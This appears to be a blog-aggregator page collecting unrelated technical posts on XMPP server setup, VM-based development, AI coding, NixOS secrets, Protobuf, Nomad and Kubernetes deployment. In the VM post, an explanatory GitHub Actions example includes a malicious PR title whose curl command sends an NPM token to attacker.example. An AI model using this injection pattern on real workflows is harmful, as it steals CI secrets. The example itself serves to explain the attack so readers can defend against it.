Enabling file uploads is done with . First, create a folder where the uploads should be stored. Now update the ejabberd configuration like this: The allowed file upload size is defined in the param and is set to 10MB. Make sure to delete uploaded files after a reasonable amount of time via a cronjob. Here is an example of a cronjob that deletes files older than one week. Registration in ejabberd is done via and can be enabled with these entries in the config file: If you want to enable registration for your server, make sure you enable a captcha for it. Otherwise you will get a lot of spam and fake registrations. ejabberd provides a working captcha script that you can copy to your server and link in your configuration. You will need and installed on your system. In the config file, ejabberd can provision TLS certificates on its own - no need to install certbot . To avoid exposing ejabberd directly to the internet, nginx is put in front of the XMPP server. Instead of nginx , any other web server (caddy, …) or proxy can be used as well. Here is a sample config for nginx : The nginx vhost offers files, and , for indicating which other connection methods (BOSH, WS) your server offers. The details can be read in the XEP-0156 extension. In contrast to the examples in the XEP, our server offers no BOSH, only a websocket connection. The BOSH part is removed from the config file. host-meta.json Put that file in a folder your nginx serves. Have a look at the path and URL it is expected to be at, see . Clients I can recommend are Profanity , an easy-to-use command-line client, and Monal for macOS and iOS. A good overview of clients can be found on the official XMPP website .
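The upload-cleanup cronjob mentioned above boils down to a `find … -mtime +7 -delete`. Here is a sketch; the upload path in the cron line is an assumption, and the demo below runs against a scratch directory so it can be executed as-is:

```shell
# The real cron entry would look something like this (path is an assumption,
# point it at the folder you configured for uploads):
#   0 3 * * * find /var/lib/ejabberd/upload -type f -mtime +7 -delete

# Demo of the cleanup logic in a scratch directory:
UPLOAD_DIR="$(mktemp -d)"
touch -d '10 days ago' "$UPLOAD_DIR/old-upload.bin"   # simulate a week-old file
touch "$UPLOAD_DIR/fresh-upload.bin"                  # simulate a fresh file
find "$UPLOAD_DIR" -type f -mtime +7 -delete          # delete files older than 7 days
ls "$UPLOAD_DIR"                                      # only fresh-upload.bin remains
```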
Citizen-led initiative collecting information about Chat Control https://fightchatcontrol.eu   ↩︎ Explanation by Patrick Breyer, former member of the European Parliament https://www.patrick-breyer.de/en/posts/chat-control/   ↩︎ 5222 : Jabber/XMPP client connections, plain or STARTTLS 5223 : Jabber client connections, using the old SSL method 5269 : Jabber/XMPP incoming server connections 5280/5443 : HTTP/HTTPS for Web Admin and many more 7777 : SOCKS5 file transfer proxy 3478/5349 : STUN+TURN/STUNS+TURNS service XMPP over HTTP is disabled ( mod_bosh ) Discovering when a user last accessed the server is disabled ( mod_last ) Uploaded files are deleted on a regular basis (see upload config ) Registering an account via a web page is disabled ( mod_register_web ) In-band registration can be enabled, default off, captcha-secured ( mod_register , see registration config )

crtns 2 months ago

Why I Moved Development to VMs

I've had it with supply chain attacks. The recent inclusion of malware into the package was the last straw for me. Malware being distributed in hijacked packages isn't a new phenomenon, but this was an attack specifically targeting developers. It publicly dumped user secrets to GitHub and exposed private GitHub repos publicly. I would have been a victim of this malware if I had not gotten lucky. I develop personal projects in TypeScript. I've used . Sensitive credentials are stored in my environment variables and configs. Personal documents live in my home directory. And I run untrusted code in that same environment, giving any malware full access to all my data. First, the attackers utilized a misconfigured GitHub Action in the repo using a common attack pattern, the trigger. The target repo's is available to the source repo's code in the pull request when using this trigger, which in the worst case can be used to read and exfiltrate secrets, just as it was in this incident. 💭 This trigger type is currently insecure by default . The GitHub documentation contains a warning about properly configuring permissions before using , but when security rests on developers reading a warning in your docs, you probably have a design flaw that documentation won't fix. Second, they leveraged script injection. The workflow in question interpolated the PR title directly into a script step without parsing or validating the input beforehand. A malicious PR triggered an inline execution of a modified script that sent a sensitive NPM token to the attacker. 💭 Combining shell scripts with templating is a GitHub Actions feature that is insecure by design . There is a reason why the GitHub documentation is full of warnings about script injection . A more secure system would require explicit eval of all inputs instead of direct interpolation of inputs into code. I'm moving to development in VMs to provide stronger isolation between my development environments and my host machine.
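To recap the attack chain described above, a minimal illustration of the two weaknesses combined might look like this (entirely made up for illustration — not the actual compromised workflow):

```yaml
# Illustrative sketch only -- not the real workflow.
name: pr-greeter
on: pull_request_target   # runs with the target repo's secrets in scope

jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # Script injection: the attacker-controlled PR title is interpolated
      # directly into the shell script before it runs. A title like
      #   "; curl -d "$NPM_TOKEN" https://attacker.example; echo "
      # would execute in a context where the secret is reachable.
      - run: echo "Thanks for the PR: ${{ github.event.pull_request.title }}"
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
```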
Lima has become my tool of choice for creating and managing these virtual machines. It comes with a clean CLI as its primary interface, and a simple YAML-based configuration file that can be used to customize each VM instance. Despite having many years of experience using Vagrant and containers, I chose Lima instead. From a security perspective, the way Vagrant boxes are created and distributed is a problem for me. The provenance of these images is not clear once they're uploaded to Vagrant Cloud. To prove my point, I created and now own the and Vagrant registries. To my knowledge, there's no way to verify the true ownership of any registries in Vagrant Cloud. Lima directly uses the cloud images published by each Linux distribution. Here's a snippet of the Fedora 42 template . Not perfect, but more trustworthy. I also considered Devcontainers, but I prefer the VM solution for a few reasons. While containers are great for consistent team environments or application deploys, I like the stronger isolation boundary that VMs provide. Container escapes and kernel exploits are a class of vulnerability that VMs can mitigate but containers cannot. Finally, the Devcontainer spec introduces complexity I don't want to manage for personal project development. I want to treat my dev environment like a persistent desktop where I can install tools without editing Dockerfiles. VMs are better suited to emulate a real workstation without the workarounds required by containers. Out of the box, most Lima templates are not locked down, but Lima lets you clone and configure any template before creating or starting a VM. By default, Lima VMs enable read-only file-sharing between the host user's home directory and the VM, which exposes sensitive information to the VM. I configure each VM with project-specific file-sharing and no automatic port forwarding. Here's my configuration for .
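A minimal sketch of such a template override, following Lima's template schema (the mount path is an assumption for this sketch):

```yaml
# Replace Lima's default read-only mount of $HOME with a writable,
# project-specific mount (the location below is a placeholder).
mounts:
  - location: "~/src/my-project"
    writable: true

# Don't automatically forward ports that start listening inside the guest.
portForwards:
  - guestPortRange: [1, 65535]
    ignore: true
```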
This template can then be used to create a VM instance. After creation of the VM is complete, accessing it over SSH can be done transparently via the subcommand. The VM is now ready to be connected to my IDE. I'm mostly a JetBrains IDE user. These IDEs have a Remote Development feature that enables a near-local development experience with VMs. A client-server communication model over an SSH tunnel enables this to work. Connecting my IDE to my VM was a 5-minute process that included selecting my Lima SSH config ( ) for the connection and picking a project directory. The most time-consuming part of this was waiting for the IDE to download the server component to the VM. After that, the IDE setup was done. I had a fully working IDE and shell access to the VM in the IDE terminals. I haven't found any features that don't work as expected. There is also granular control over SSH port-forwarding between the VM (remote) and host (local) built in, which is convenient for me when I'm developing a backend application. The integration between Podman/Docker and these IDEs extends to the Remote Development feature as well. I can run a full instance of Podman within my VM, and once the IDE is connected to the VM's instance of Podman, I can easily forward listening ports from my containers back to my host. The switch to VMs took me an afternoon to set up and I get the same development experience with actual security boundaries between untrusted code and my personal data. Lima has made VM-based development surprisingly painless, and I worry a lot less about the next supply chain attack.

Jampa.dev 2 months ago

Why AI for coding is so polarizing

If you spend any time online, you've probably seen the wildly different opinions on using LLMs in coding. On one side, Twitter bros bragging about how they built “a $1k revenue app in just 10 days using AI”. On the other, engineers who refuse to use any LLM tool at all. You'll find them in every thread, insisting that AI sucks, produces garbage code, and only adds to technical debt. Alt text: The most civilized Anti-AI vs Pro-AI conversation on Twitter. Joking aside, some people use AI to do great things daily, while others have problems with it and have given up.  The difference is context. An LLM has no sapience. Everything the AI cooks up is a product of its training corpus, fine-tuning, and a system + user prompt (with a bit of randomness for seasoning). No matter how clever your prompt is, the training data is its foundation. This is why companies are so aggressively scraping the web. If you create a new language tomorrow called FunkyScript, the AI will be terrible at it, regardless of your prompt. This explains the different experiences of AI detractors and champions. On the one hand, you have people new to coding working on greenfield projects with popular tools like Tailwind and React (which have a massive training corpus). On the other hand, you have engineers working with more niche tools. A great example is CircleCI’s YAML configuration. Since CircleCI has documentation that's difficult for an AI to ingest (because it sucks), the AI starts hallucinating and spitting out code for GitHub Actions instead. Then there's the context window, the "short-term memory" of the AI. It's a known issue that the more context you stuff into a prompt, the "dumber" the model can get. When you're working on a greenfield project, there are no existing files or dependencies, so you don't need to provide much context, which saves you from spending tokens on it. But greenfield projects aren't the norm .
The norm is a legacy codebase built by multiple people who changed many parts and then left the company. Some of it has parts that don't make sense even to a human, much less to an LLM. All this extra context weighs the LLM down with tokens. Consider the same prompt: " Change all the colors to blue on my Auth page ." In a new project, the AI can probably find and handle the relevant files. But on a mature codebase, that auth page is tied to a color system, part of a larger design system. Now the AI is in trouble. Throw in some unit tests that will inevitably break, and the AI is completely lost. "Hey AI, you broke this stuff" — you say, thinking you are not using AI enough. Then the AI sycophantically replies: "You are absolutely right! Let me try another approach!" Now you're the one in trouble . It's time to shut the AI down and salvage what you can from the wreckage. This isn't a perfect fix, but there is a strategy to make the AI less destructive and, eventually, genuinely helpful. You'll have to decide if the upfront effort is worth it compared to manually coding. It won't be worth it for the FunkyScript codebase, but I have succeeded on niche stacks, like mobile E2E. In complex codebases, an AI must learn your project's unique patterns with every prompt. The solution is to give it that knowledge upfront, rather than making it rediscover everything at "runtime." Having a good , for example, which an LLM can read before performing a task, helps the AI understand what makes your project different from its base model. Your is not for you to say “ do it right, stop making it wrong ” like a lot of people do. We can even use the AI itself to help. Here is an example prompt. You should provide more high-level context for a real project, especially if your README.md sucks . You are a senior engineer onboarding another senior engineer to our codebase. Analyze the provided files at a high level. Study its structure and patterns, then write a document explaining how to work on it.
Highlight the parts that differ from common industry patterns for this language and framework. For example, do you use Bun instead of npm? Inline styles instead of CSS? These are crucial details the model needs to know; otherwise, it will default to the most common patterns in its training data. So, the next time someone gives an opinion on AI that differs from yours, maybe don't immediately jump to arguing. They aren't necessarily doomers who will be replaced, nor are they grifters selling snake oil. Consider that not every engineer works on your stack / codebase. …. or maybe they are all koopas: Thanks for reading Jampa.dev! Subscribe for free to receive my shitposts and Goomba fallacies.


Secret Management on NixOS with sops-nix

Passwords and secrets like cryptographic key files are everywhere in computing. When configuring a Linux system, sooner or later you will need to put a password somewhere — for example, when I migrated my existing Linux Network Attached Storage (NAS) setup to NixOS , I needed to specify the desired Samba passwords in my NixOS config (or manage them manually, outside of NixOS). For personal computers, this is fine, but if the goal is to share system configurations (for example in a Git repository), we need a different solution: Secret Management. The basic idea behind Secret Management systems is to encrypt the secrets at rest, meaning if somebody clones the git repository containing your NixOS system configurations, they cannot access (and therefore, also not deploy) the encrypted secrets. Conceptually, we need to: In this article, I will show how to accomplish the above using sops-nix. Here’s a quick overview of the three different building blocks we will use: You might wonder why I chose sops-nix over agenix , the other contender. The instructions for setting up sops-nix made more sense to me when I first looked at it, and I wanted to have the option to use sops in other ways, not just with age. If you’re curious about agenix, check out Andreas Gohr’s blog post about agenix . I ran the following instructions on an Arch Linux machine on which I installed the Nix tool and enabled Nix Flakes . Follow the link for instructions also for other systems like Debian or Fedora. I don’t want to manage an extra key file, so I’ll use to derive a key from my SSH private key file, which I already take good care of to back up: (The option is documented in the ssh-to-age README .) To display the age recipient (public key) of this age identity (private key), I used: Similarly, I will derive an age recipient from the SSH host key of the remote system: In my git repository (nix-configs), I have one subdirectory per NixOS system, i.e.
shows: In the root of the git repository (next to the directory), I create like so: The more systems I manage, the more and I will need to configure. The creation rules tell sops which keys to use when encrypting a file. In my setups, I typically use only a single file per system, but I could imagine splitting out some secrets into a separate file if I wanted to collaborate with someone on just one aspect of the system. Now that we told sops which recipients to encrypt for, we can decrypt and edit in our configured editor by running: The simplest key file contains just one key, for example: After saving and exiting your editor, sops will update the encrypted secrets/example.yaml. Now, we need to reference the encrypted file in NixOS and enable integration to make the decrypted secrets available on the system. In , I added to the section and added the NixOS module. I show the entire diff because the places where the lines go are just as important as what the lines say: Then, in , we tell to use the SSH host key as identity, where sops will find our secrets and which secrets should realize on the remote system: After deploying, we can access the secret on the running system: Of course, even after rebooting the machine, the secrets remain available without a re-deploy: Now that we have secrets stored in files under , how can we use these secrets? The following sections show a few common ways. Let’s assume you have deployed a custom Go server as a systemd service on NixOS as follows, and you want to start managing the cleartext secret passed via the and command-line flags: With the following sops secrets: …we need to adjust our NixOS config to read these secret files at runtime. Because the directive is interpreted by systemd and not passed through a shell, we use the helper and then just the files: What if the service in question does not use command-line flags, but environment variables for configuring secrets? 
We can put an environment variable file into a sops-managed secret: …and then we make systemd apply these environment variables from the secrets file: If you are configuring a NixOS module (instead of declaring a custom service), the option might not always be called . For example, for the oauth2-proxy service, you would need to configure the option : In the previous examples, we configured the of each secret to the user account under which the service is running. But what if there is no such user account, because the service uses systemd’s feature? We can use systemd’s feature! For example, I supply the SMTP password to my Prometheus Alertmanager as follows: In my blog post “Migrating my NAS from CoreOS/Flatcar Linux to NixOS” , I describe how to configure samba users and passwords (from sops-managed secrets) with an shell script (which is very similar to the techniques already explained). Managing secrets as separately-encrypted files in your config repository makes sense to me! age’s ability to work with SSH keys makes for a really convenient setup, in my opinion. Encrypting secrets for the destination system’s SSH host key feels very elegant. I hope the examples above are sufficient for you to efficiently configure secrets in NixOS! Encrypt the secrets such that the target system can decrypt them. Encrypt the secrets such that other people working on this config can decrypt them. Have the target system decrypt secrets at runtime. Tell our software where to access the decrypted secrets. sops is a tool to version-control secrets in git, in their encrypted form. sops makes it easy to re-encrypt these secrets when adding/removing authorized keys. sops is very flexible and can work with tons of other tools/providers. sops-nix provides a way to integrate sops with Nix/NixOS. Using sops with allows us to use our existing SSH private key (humans) or SSH host private key (machines) instead of managing a separate set of key files.
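Coming back to the creation rules discussed earlier: a .sops.yaml along these lines encrypts each system's secrets to both a personal key and the key derived from that system's SSH host key (a sketch — the age recipients are placeholders and the directory layout is an assumption):

```yaml
creation_rules:
  # Secrets for one system, encrypted to my workstation's age key and to
  # the recipient derived from that system's SSH host key (placeholders).
  - path_regex: storage/secrets\.yaml$
    age: >-
      age1myworkstationkeyxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx,
      age1storagehostkeyxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
```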

mcyoung 7 months ago

Protobuf Tip #4: Accepting Mistakes We Can’t Fix

Bad humor is an evasion of reality; good humor is an acceptance of it. –Malcolm Muggeridge TL;DR: Protobuf’s distributed nature introduces evolution risks that make it hard to fix some types of mistakes. Sometimes the best thing to do is to just let it be. I’m editing a series of best practice pieces on Protobuf, a language that I work on which has lots of evil corner-cases. These are shorter than what I typically post here, but I think it fits with what you, dear reader, come to this blog for. These tips are also posted on the buf.build blog . Often, you’ll design and implement a feature for the software you work on, and despite your best efforts to test it, something terrible happens in production. We have a playbook for this, though: fix the bug in your program and ship or deploy the new, fixed version to your users. It might mean working late for big emergencies, but turnaround for most organizations is a day to a week. Most bugs aren’t emergencies, though. Sometimes a function has a confusing name, or an integer type is just a bit too small for real-world data, or an API conflates “zero” and “null”. You fix the API, refactor all usages in your API in one commit, merge, and the fix rolls out gradually. Unless, of course, it’s a bug in a communication API, like a serialization format: your Protobuf types, or your JSON schema, or the not-too-pretty code that parses fields out of a dict built from a YAML file. Here, you can’t just atomically fix the world. Fixing bugs in your APIs (from here on, “APIs” means “Protobuf definitions”) requires a different mindset than fixing bugs in ordinary code. Protobuf’s wire format is designed so that you can safely add new fields to a type, or values to an enum, without needing to perform an atomic upgrade. But other changes, like renaming fields or changing their type, are very dangerous.
This is because Protobuf types exist on a temporal axis: different versions of the same type exist simultaneously among programs in the field that are actively talking to each other. This means that writers from the future (that is, new serialization code) must be careful to not confuse the many readers from the past (old versions of the deserialization code). Conversely, future readers must tolerate anything past writers produce. In a modern distributed deployment, the number of versions that exist at once can be quite large. This is true even in self-hosted clusters, but becomes much more fraught whenever user-upgradable software is involved. This can include mobile applications that talk to your servers, or appliance software managed by a third-party administrator, or even just browser-service communication. The most important principle: you can’t easily control when old versions of a type or service are no longer relevant. As soon as a type escapes out of the scope of even a single team, upgrading types becomes a departmental effort. There are many places where Protobuf could have made schema evolution easier, but didn’t. For example, changing to is a breakage, even though at the wire format level, it is possible for a parser to distinguish and accept both forms of correctly. There are too many other examples to list, but it’s important to understand that the language is not always working in our favor. For example, if we notice a value is too small, and should have been 64-bit, you can’t upgrade it without readers from the past potentially truncating it. But we really have to upgrade it! What are our options? Of course, there is a third option, which is to accept that some things aren’t worth fixing. When the cost of a fix is so high, fixes just aren’t worth it, especially when the language is working against us. This means that even in Buf’s own APIs, we sometimes do things in a way that isn’t quite ideal, or is inconsistent with our own best practices.
Sometimes, the ecosystem changes in a way that changes best practice, but we can’t upgrade to it without breaking our users. In the same way, you shouldn’t rush to use new, better language features if they would cause protocol breaks: sometimes, the right thing is to do nothing, because not breaking your users is more important. Issue a new version of the message and all of its dependencies. This is the main reason why sticking a version number in the package name, as enforced by Buf’s lint rule, is so important. Do the upgrade anyway and hope nothing breaks. This can work for certain kinds of upgrades, if the underlying format is compatible, but it can have disastrous consequences if you don’t know what you’re doing, especially if it’s a type that’s not completely internal to a team’s project. Buf breaking change detection helps you avoid changes with potential for breakage.
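The first option, issuing a new version, can be sketched roughly as follows. This is a hypothetical illustration, not taken from a real API: the package names, the `Stats` message, and the `user_count` field are all invented.

```proto
// api/v1/stats.proto -- frozen forever; old readers keep parsing it.
syntax = "proto3";
package api.v1;

message Stats {
  // Too small for real-world data, but changing int32 -> int64 in
  // place would let old readers silently truncate values written by
  // new code. So we leave it alone.
  int32 user_count = 1;
}
```

```proto
// api/v2/stats.proto -- a new versioned package that clients migrate
// to deliberately, rather than an in-place change to v1.
syntax = "proto3";
package api.v2;

message Stats {
  int64 user_count = 1;  // the fixed, 64-bit field
}
```

Because the version lives in the package name, `api.v1.Stats` and `api.v2.Stats` are distinct types on the wire and in generated code, so old and new readers can coexist indefinitely.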

ENOSUCHBLOG 10 months ago

Be aware of the Makefile effect

Update 2024-01-12: Ken Shirriff has an excellent blog post on why “cargo cult” is a poor term of art. I’m not aware of a perfect term 1 for this, so I’m making one up: the Makefile effect 2. The Makefile effect boils down to this: Tools of a certain complexity or routine unfamiliarity are not run de novo, but are instead copy-pasted and tweaked from previous known-good examples. You see this effect frequently with engineers of all stripes and skill/experience levels, with Make being a common example 3:

- A task (one of a common shape) needs completing.
- A very similar (or even identical) task has been done before.
- Make (or another tool susceptible to this effect) is the correct or “best” (given expedience, path dependencies, whatever) tool for the task.
- Instead of writing a , the engineer copies a previous (sometimes very large and complicated 4 ) from a previous instance of the task and tweaks it until it works in the new context.

On one level, this is a perfectly good (even ideal) engineering response at the point of solution: applying a working example is often the parsimonious thing to do, and runs a lesser (in theory) risk of introducing bugs, since most of the work is unchanged. However, at the point of design, this suggests a tool design (or tool application 5) that is flawed: the tool (or system) is too complicated (or annoying) to use from scratch. Instead of using it to solve a problem from scratch, users repeatedly copy a known-good solution and accrete changes over time. Once you notice it, you start to see this pattern all over the place. Beyond Make:

- CI/CD configurations like GitHub Actions and GitLab CI/CD, where users copy their YAML spaghetti from the last working setup and tweak it (often with repeated re-runs) until it works again;
- Linter and formatter configurations, where a basic set of rules gets copied between projects and strengthened/loosened as needed for local conditions;
- Build systems themselves, where everything non-trivial begins to resemble the previous build system.

In many cases, perhaps not. However, I think it’s worth thinking about, especially when designing tools and systems:

- Tools and systems that enable this pattern often have less-than-ideal diagnostics or debugging support: the user has to run the tool repeatedly, often with long delays, to get back relatively small amounts of information. Think about CI/CD setups, where users diagnose their copy-pasted CI/CD by doing print-style debugging over the network with a layer of intermediating VM orchestration. Ridiculous!
- Tools that enable this pattern often discourage broad learning: a few mavens know the tool well enough to configure it, and others copy it with just enough knowledge to do targeted tweaks. This is sometimes inevitable, but often not: dependency graphs are an inherent complexity of build systems, but remembering the difference between and in Make is not.
- Tools that enable this pattern are harder to use securely: security actions typically require deep knowledge of the why behind a piece of behavior. Systems that are subject to the Makefile effect are also often ones that enable confusion between code and data (or any kind of in-band signalling more generally), in large part because functional solutions are not always secure ones. Consider, for example, template injection in GitHub Actions.

In general, I think well-designed tools (and systems) should aim to minimize this effect. This can be hard to do in a fully general manner, but some things I think about when designing a new tool:

- Does it need to be configurable?
- Does it need syntax of its own? As a corollary: can it reuse familiar syntax or idioms from other tools/CLIs?
- Do I end up copy-pasting my use of it around? If so, are others likely to do the same?

1. The Makefile effect resembles other phenomena, like cargo culting, normalization of deviance, “write-only language,” &c. I’ll argue in this post that it’s a little different from each of these, insofar as it’s not inherently ineffective or bad and concerns the outcome of specific designs. ↩
2. Also note: the title is “be aware,” not “beware.” The Makefile effect is not inherently bad! It’s something to be aware of when designing tools and systems. ↩
3. Make is just an example, and not a universal one: different groups of people master different tools. The larger observation is that there are classes of tools/systems that are (more) susceptible to this, and classes that are (relatively) less susceptible to it. ↩
4. I’ve heard people joke about their “heritage” s, i.e. s that were passed down to them by senior engineers, professors, &c. The implication is that these forebears also inherited the , and have been passing it down with small tweaks since time immemorial. ↩
5. Complex tools are a necessity; they can’t always be avoided. However, the occurrence of the Makefile effect in a simple application suggests that the tool is too complicated for that application. ↩
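To make the running example concrete, here is a sketch of the kind of Makefile that tends to get inherited and tweaked rather than written from scratch. The targets, flags, and file names are invented for illustration:

```make
# A typical "heritage" Makefile: nobody remembers why every flag is
# here, but it works, so it gets copied into the next project.
# (Note: recipe lines must be indented with a tab, not spaces --
# itself a classic Make footgun.)
CC      ?= cc
CFLAGS  ?= -Wall -Wextra -O2

# $@ expands to the target, $< to the first prerequisite, $^ to all
# prerequisites -- exactly the kind of detail people copy rather
# than remember.
%.o: %.c
	$(CC) $(CFLAGS) -c $< -o $@

app: main.o util.o
	$(CC) $(CFLAGS) $^ -o $@

.PHONY: clean
clean:
	rm -f app *.o
```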

Karan Sharma 2 years ago

Nomad can do everything that K8s can

This blog post is ignited by the following Twitter exchange: I don’t take the accusation of unsubstantiated argument, especially on a technical topic, lightly. I firmly believe in substantiated arguments and hence, here I am, elaborating on my stance. If found mistaken, I am open to corrections and will revise my stance. In my professional capacity, I have run and managed several K8s clusters (using AWS EKS) for our entire team of devs (been there, done that). The most complex piece of our otherwise simple and clean stack was K8s and we’d been longing to find a better replacement. None of us knew whether that would be Nomad or anything else. But we took the chance and we have reached a stage where we can objectively argue that, for our specific workloads, Nomad has proven to be a superior tool compared to K8s. Nomad presents a fundamental building-block approach to designing your own services. It used to be true that Nomad was primarily a scheduler, and for serious production workloads, you had to rely on Consul for service discovery and Vault for secret management. However, this scenario has changed as Nomad now seamlessly integrates these features, making them first-class citizens in its environment. Our team replaced our HashiCorp stack with just Nomad, and we never felt constrained in terms of what we could accomplish with Consul/Vault. While these tools still hold relevance for larger clusters managed by numerous teams, they are not necessary for our use case. Kubernetes employs a declarative state for every operation in the cluster, essentially operating as a reconciliation mechanism to keep everything in check. In contrast, Nomad requires dealing with fewer components, making it appear lacking compared to K8s’s concept of everything being a “resource”. However, that is far from the truth. One of my primary critiques of K8s is its hidden complexities. While these abstractions might simplify things on the surface, debugging becomes a nightmare when issues arise.
Even after three years of managing K8s clusters, I’ve never felt confident dealing with databases or handling complex networking problems involving dropped packets. You might argue that it’s about technical chops, which I won’t disagree with - but then do you want to add value to the business by getting shit done, or do you want to be the resident K8s whiz at your organization? Consider this: How many people do you know who run their own K8s clusters? Even the K8s experts themselves preach about running prod clusters on EKS/GKE etc. How many fully leverage all that K8s has to offer? How many are even aware of all the network routing intricacies managed by kube-proxy? If these queries stir up clouds of uncertainty, it’s possible you’re sipping the Kubernetes Kool-Aid without truly comprehending the recipe, much like I found myself doing at one point. Now, if you’re under the impression that I’m singing unabashed praises for Nomad, let me clarify - Nomad has its share of challenges. I’ve personally encountered and reported several. However, the crucial difference lies in Nomad’s lesser degree of abstraction, allowing for a comprehensive understanding of its internals. For instance, we encountered service reconciliation issues with a particular Nomad version. However, we could query the APIs, identify the problem, and write a bash script to resolve and reconcile it. That wouldn’t have been possible if there were too many moving parts in the system and we didn’t know where to even begin debugging. The YAML hell is all too well known to all of us. In K8s, writing job manifests required a lot of effort (by the developers who don’t work with K8s all day) and the manifests were very complex to understand. It felt “too verbose” and involved copy-pasting large blocks from the docs and trying to make things work. Compare that to HCL: it feels much nicer to read, and shorter. Things are more straightforward to understand. I’ve not even touched upon the niceties of Nomad yet.
Like more humanly understandable ACLs? A cleaner and simpler job spec, which defines the entire job in one file? A UI which actually shows everything about your cluster, nodes, and jobs? Not restricting your workloads to be run as Docker containers? A single binary which powers all of this? The central question this post aims to raise is: What can K8s do that Nomad can’t, especially considering the features people truly need? My perspectives are informed not only by my organization but also through interactions with several other organizations at various meetups and conferences. Yet, I have rarely encountered a use case that could only be managed by K8s. While Nomad isn’t a panacea for all issues, it’s certainly worth a try. Reducing the complexity of your tech stack can prove beneficial for your applications and, most importantly, your developers. At this point, K8s enjoys immense industry-wide support, while Nomad remains the unassuming newcomer. This contrast is not a negative aspect, per se. Large organizations often gravitate towards complexity and the opportunity to engage more engineers. However, if simplicity were the primary goal, the prevailing sense of overwhelming complexity in the infrastructure and operations domain wouldn’t be as pervasive. I hope my arguments provide a more comprehensive perspective and address the earlier critique of being unsubstantiated. Darren has responded to this blog post. You can read the response on Twitter.

- Ingress: We run a set of HAProxy on a few nodes which act as “L7 LBs”. Configured with Nomad services, they can do the routing based on Host headers.
- DNS: To provide external access to a service without using a proxy, we developed a tool that scans all services registered in the cluster and creates a corresponding DNS record on AWS Route53.
- Monitoring: Ah, my fav. You wanna monitor your K8s cluster? Sure, here’s kube-prometheus, prometheus-operator, kube-state-metrics. Choices, choices. Enough to confuse you for days. Anyone who’s ever deployed any of these, tell me why this thing needs such a monstrous setup of CRDs and operators. Monitoring Nomad is such a breeze: 3 lines of HCL config and done.
- Statefulsets: It’s 2023 and the irony is rich - the recommended way to run a database inside K8s is… not to run it inside K8s at all. In Nomad, we run a bunch of EC2 instances and tag them as nodes. The DBs don’t float around as containers to random nodes. And there’s no CSI plugin reaching for a storage disk in AZ-1 when the node is basking in AZ-2. Running a DB on Nomad feels refreshingly like running it on an unadorned EC2 instance.
- Autoscale: All our client nodes (except for the nodes) are ephemeral and part of AWS’s Auto Scaling Groups (ASGs). We use ASG rules for the horizontal scaling of the cluster. While Nomad does have its own autoscaler, our preference is to run large instances dedicated to specific workloads, avoiding a mix of different workloads on the same machine.
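The “3 lines of HCL” most likely refers to the `telemetry` stanza in the Nomad agent configuration, which exposes metrics for Prometheus to scrape. A minimal sketch (option names are from Nomad’s agent configuration; availability may vary by version):

```hcl
# In the Nomad agent config: expose metrics in Prometheus format at
# /v1/metrics, including per-allocation and per-node metrics.
telemetry {
  prometheus_metrics         = true
  publish_allocation_metrics = true
  publish_node_metrics       = true
}
```

With this in place, a Prometheus scrape job pointed at the agents’ `/v1/metrics?format=prometheus` endpoint is enough to start graphing the cluster.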


The yaml document from hell

As a data format, yaml is extremely complicated and it has many footguns. In this post I explain some of those pitfalls by means of an example, and I suggest a few simpler and safer yaml alternatives.
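A classic example of the kind of footgun the post refers to is the “Norway problem”: in YAML 1.1 (which many parsers still implement), several unquoted scalars are silently interpreted as booleans. A sketch:

```yaml
# In YAML 1.1 parsers, unquoted "no" loads as the boolean false, so
# this list of country codes becomes [true, false]:
countries:
  - yes   # parsed as true, not the string "yes"
  - no    # parsed as false, not the string "no" (Norway!)

# Quoting restores the intended strings:
countries_quoted:
  - "yes"
  - "no"
```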

alikhil 6 years ago

Deploy SPA application to Kubernetes

Hello, folks! Today I want to share with you a tutorial on how to deploy your SPA application to Kubernetes. The tutorial is oriented toward those who aren’t very familiar with Docker and k8s but want their single-page application to run in k8s. I expect that you have Docker installed on your machine. If you don’t, you can install it by following the official installation guide. As the SPA project I will use vue-realworld-example-app. You can use your own SPA project if you have one. So, I have cloned it, installed dependencies and built it: The next step is to decide how our application will be served. There are a bunch of possible solutions, but I decided to use nginx since it has a reputation as one of the best HTTP servers. To serve an SPA we need to return all requested files if they exist, or otherwise fall back to index.html. To do so I wrote the following nginx config: The full config file can be found in my fork of the repo. Then, we need to write a Dockerfile for building an image with our application. Here it is: We assume that the build artifacts are placed in the directory, so that during the docker build the content of the directory is copied into the container’s directory. Now, we are ready to build it: And run it: Then if we open http://localhost:8080 we will see something similar to: Cool! It works! We will need to use our newly built docker image to deploy to k8s. So, we need to make it available from the k8s cluster by pushing it to some docker registry. I will push the image to DockerHub: To run the application in k8s we will use the resource type. Here it is: deployment.yaml Then we create the deployment by running and the newly created pods can be found: Then we need to expose our app to the world. It can be done by using a service of type NodePort or via Ingress. We will do it with Ingress. For that we will need a service: service.yaml And the ingress itself: ingress.yaml And here it is! Our SPA runs in k8s!
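The nginx config referenced above did not survive in this copy of the post. A minimal sketch of the fallback behavior it describes (serve the requested file if it exists, otherwise hand the request to index.html so the SPA router can take over); the root path is illustrative:

```nginx
server {
    listen 80;
    root /usr/share/nginx/html;
    index index.html;

    location / {
        # Try the exact file, then a directory, then fall back to
        # index.html for client-side routing.
        try_files $uri $uri/ /index.html;
    }
}
```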

alikhil 7 years ago

Oauth2 Proxy for Kubernetes Services

Hello, folks! In this post, I will go through configuring Bitly OAuth2 proxy in a kubernetes cluster. There is a fresh tutorial about oauth2-proxy. A few days ago I was configuring SSO for our internal dev-services in KE Technologies. I spent the whole day making it work properly, and at the end I decided to share my experience by writing this post, hoping that it will help others (and possibly me in the future) to go through this process. We have internal services in our k8s cluster that we want to be accessible for developers. It can be kubernetes-dashboard or kibana or anything else. Before that we used Basic Auth, which is easy to set up in ingresses. But this approach has several disadvantages:

- We need to share a single pair of login and password for all services among all developers
- Developers will be asked to enter credentials each time they access a service for the first time

What we want is that a developer logs in once and has access to all other services without additional authentication. So, a possible scenario could be:

- Developers open https://kibana.example.com which is an internal service
- The browser redirects them to https://auth.example.com where they sign in
- After successful authentication the browser redirects them back to https://kibana.example.com

